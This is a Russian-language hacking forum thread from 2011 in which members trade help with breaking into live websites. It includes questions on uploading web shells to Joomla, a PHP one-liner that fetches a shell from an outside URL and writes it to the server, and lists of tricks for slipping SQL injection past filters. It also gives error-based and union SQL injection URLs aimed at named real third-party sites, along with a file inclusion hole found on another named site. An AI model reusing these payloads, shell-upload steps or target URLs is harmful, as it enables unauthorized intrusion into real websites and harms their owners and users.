Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kyboe

    kyboe New Member

    Joined:
    26 Oct 2011
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Как залить шелл на сайтe Jooma ?
    Там стоит virtuemart если что.
     
  2. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    kyboe,
    есть админка? Если есть, то в чем проблема? Если нет, то делай уроки :D
    Einstein,
    скинь сайт в ЛС, разберусь.

    Люди! Как найти шелл, если сервер WINDOWS? grep, find это никсовые...
     
  3. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Что-бы не разбираться, попробуй не советовать такую чушь )
     
    1 person likes this.
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    http://forum.antichat.ru/showpost.php?p=1809203&postcount=173
     
    _________________________
  5. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    как крутить дальше не пойму?

    http://www.flukehearing.com/news_manager.php?page=6616'
     
  6. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    залил шелл
    но как тепреь залить нормальный шелл туда?:) с помощью этого минишелла?? подскажите плс в пм буду оч признателен
     
  7. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    file_put_contents('yashell.php', file_get_contents('http://ya.ru/shell.txt'));
    Это если url_fopen еще разрешен.
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Warning: include() [function.include]: Failed opening 'sn/6616dfgh.htm' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/fluke/public_html/news_manager.php on line 11

    Как бы намекает что это Local File Inclusion (LFI), где к подключаемым станицам добавляется .htm
     
    _________________________
    1 person likes this.
  9. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    кто нибудь знает онлайновый кодер из str скажем в char
    например
    asd = CHAR(97,115,100)

    мне надо в binary или нех вида
    0x123834756
     
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    http://x3k.ru/
     
  11. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    спасибо а можно ли обойти фильтрацию слов union+select+
    видом +0x556e696f6e+0x53654c656374+
    скобки тоже фильтруются
    если нет то как по другому?
    Точнее фильтруется Union
     
    #18271 crackforme, 7 Nov 2011
    Last edited: 7 Nov 2011
  12. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    /*!union*/+/*!select*/
    union%0aselect
    /*!UnIoN+SeLeCt*/
    UnIoN/**/SeLeCt
    %75%6e%69%6f%6e%2b%73%65%6c%65%63%74
    asdunionasdselectasd
    %75%6e%69%6f%6e%0a%73%65%6c%65%63%74
     
  13. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    спасибо

    union%0aselect
     
    #18273 crackforme, 7 Nov 2011
    Last edited: 7 Nov 2011
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    union%09select

    union/**/select

    id=(5)union(select(1),(2))
     
    _________________________
  15. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Вроде бы sql inj есть, но не получается раскрутить(
     
  16. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    PHP:
    regexp code(1) : eval()'d code on line 1
    пишет ошибку вероятно из за кавычек как мне это убрать?
     
  17. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Помогите пожалуйста
    Ошибка вверху сливается с темным фоном
     
  18. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://la2.war-top.ru/index.php?do=sitedetails&id=186' or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -
    а дальше сам.
    хинт: error based.
     
    1 person likes this.
  19. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Зачем $_GET юзаете? =/
    Другой масив используйте, или накрайняк $_REQUEST уж так надо $_GET оставить.

    _https://rdot.org/forum/showthread.php?t=118
    2-пост
     
  20. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    в этом параметре инъекции нет. зато есть в другом:
    http://la2-shop.ru/categories.php?id_msg=2'+union+select+1,2,3--+
    вывод в тайтле.
     
Thread Status:
Not open for further replies.